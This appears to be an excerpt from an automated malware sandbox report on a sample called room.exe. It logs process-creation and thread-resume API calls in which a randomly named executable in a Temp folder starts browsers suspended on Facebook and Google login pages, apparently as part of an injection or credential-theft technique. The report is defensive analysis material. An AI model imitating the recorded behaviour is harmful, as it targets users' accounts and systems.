CreateProcessInternalW Jan. 19, 2024, 7:57 a.m.	thread_identifier: 2216 thread_handle: 0x00000660 process_identifier: 2204 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e filepath: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\TTPWYoz21cqHkGJWQZz9.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\TTPWYoz21cqHkGJWQZz9.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\TTPWYoz21cqHkGJWQZz9.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000668	1	1
CreateProcessInternalW Jan. 19, 2024, 7:56 a.m.	thread_identifier: 2840 thread_handle: 0x000001d0 process_identifier: 2836 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e filepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome filepath_r: C:\Program Files (x86)\Internet Explorer\iexplore.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000001cc	1	1
NtResumeThread Jan. 19, 2024, 7:57 a.m.	thread_handle: 0x00000270 suspend_count: 1 process_identifier: 2784	1	0
CreateProcessInternalW Jan. 19, 2024, 7:58 a.m.	thread_identifier: 2584 thread_handle: 0x000002d0 process_identifier: 2568 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002dc	1	1
NtResumeThread Jan. 19, 2024, 7:58 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2568	1	0
CreateProcessInternalW Jan. 19, 2024, 7:58 a.m.	thread_identifier: 1820 thread_handle: 0x000002d0 process_identifier: 3060 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000001b8	1	1
NtResumeThread Jan. 19, 2024, 7:58 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 3060	1	0
CreateProcessInternalW Jan. 19, 2024, 7:58 a.m.	thread_identifier: 536 thread_handle: 0x00000290 process_identifier: 2760 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000288	1	1
NtResumeThread Jan. 19, 2024, 7:58 a.m.	thread_handle: 0x00000290 suspend_count: 1 process_identifier: 2760	1	0
CreateProcessInternalW Jan. 19, 2024, 7:58 a.m.	thread_identifier: 676 thread_handle: 0x000002b0 process_identifier: 1012 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b4	1	1
NtResumeThread Jan. 19, 2024, 7:58 a.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 1012	1	0
CreateProcessInternalW Jan. 19, 2024, 7:58 a.m.	thread_identifier: 840 thread_handle: 0x000002ec process_identifier: 1132 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000298	1	1
NtResumeThread Jan. 19, 2024, 7:58 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 1132	1	0
CreateProcessInternalW Jan. 19, 2024, 7:58 a.m.	thread_identifier: 2532 thread_handle: 0x000002ec process_identifier: 2524 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002e4	1	1
NtResumeThread Jan. 19, 2024, 7:58 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2524	1	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x00000218 suspend_count: 1 process_identifier: 2836	1	0
CreateProcessInternalW Jan. 19, 2024, 7:56 a.m.	thread_identifier: 2916 thread_handle: 0x0000033c process_identifier: 2912 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2836 CREDAT:145409 filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000340	1	1
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 2912	1	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x00000414 suspend_count: 1 process_identifier: 2836	1	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 2836	1	0
NtGetContextThread Jan. 19, 2024, 7:57 a.m.	thread_handle: 0x0000074c	1	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x000001fc suspend_count: 1 process_identifier: 2912	1	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x00000230 suspend_count: 1 process_identifier: 2912	1	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 2912	1	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x00000794 suspend_count: 1 process_identifier: 2912	1	0
NtResumeThread Jan. 19, 2024, 7:57 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2292	1	0
NtResumeThread Jan. 19, 2024, 7:57 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2292	1	0

room.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All